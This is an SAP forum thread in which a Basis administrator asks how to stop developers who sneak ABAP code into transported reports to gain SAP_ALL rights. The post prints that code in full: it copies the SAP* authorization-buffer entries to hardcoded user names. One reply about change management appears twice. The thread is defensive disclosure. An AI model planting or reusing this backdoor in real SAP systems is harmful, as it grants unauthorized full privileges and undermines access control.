03-28-2013 1:32 PM
dear experts,
last some days we are as Basis team monitored that, some our abap
programmers getting sap_all authorization in production or quality
system
using non-standart methods. procedure of getting sap_all going like this: they are changes (or adds) any Z (Y) reports in developer system.
after
this using transport system changed program code going to quality and
production system.
starting new transported report user getting temporarily sap_all
authorization.
we have found and deleted this piece of code from report. but we do not
know how to disable this absolutely?
please help us how to restrict codes like this in future.
below you can find piece of this code and link where described this
procedure :
DATA zusrbf2 LIKE usrbf2 OCCURS 0 WITH HEADER LINE.
DATA: BEGIN OF it OCCURS 0
, uname LIKE sy-uname
, END OF it.
CLEAR : it.
it-uname = 'USER-1'.
APPEND it.
it-uname = 'USER-2'.
APPEND it.
it-uname = 'USER-3'.
APPEND it.
LOOP AT it.
SELECT * FROM usrbf2 CLIENT SPECIFIED
INTO TABLE zusrbf2
WHERE mandt = '000'(001) AND
bname = 'SAP*'(002) AND
auth = '&_SAP_ALL'(003).
IF sy-subrc NE 0.
EXIT.
ENDIF.
LOOP AT zusrbf2.
zusrbf2-bname = it-uname.
MODIFY zusrbf2 INDEX sy-tabix TRANSPORTING bname.
ENDLOOP.
INSERT usrbf2 FROM TABLE zusrbf2 ACCEPTING DUPLICATE KEYS.
ENDLOOP.
(link where this procedure explained with details)
http://zodano.wordpress.com/2009/05/06/sap-secret-skip-sap-authority-check/
thanks in advance
Shahin
03-28-2013 8:29 PM
That is very naughty of them, but the code is very ugly. Badly commented and much too long...
You need to consider whether this behaviour is a problem with the fact that the role and user administration SLA delivery does not support the development support requirements, or, whether this is the developers begging to be fired.
Note that if they were creating Z-reports with this authorization instead of transporting, then there is more of this rubbish in the system.
Basically... you will have to get change management back under control before the developers screw up the whole landscape and then only code in production in future...
Cheers,
Julius
03-28-2013 8:29 PM
That is very naughty of them, but the code is very ugly. Badly commented and much too long...
You need to consider whether this behaviour is a problem with the fact that the role and user administration SLA delivery does not support the development support requirements, or, whether this is the developers begging to be fired.
Note that if they were creating Z-reports with this authorization instead of transporting, then there is more of this rubbish in the system.
Basically... you will have to get change management back under control before the developers screw up the whole landscape and then only code in production in future...
Cheers,
Julius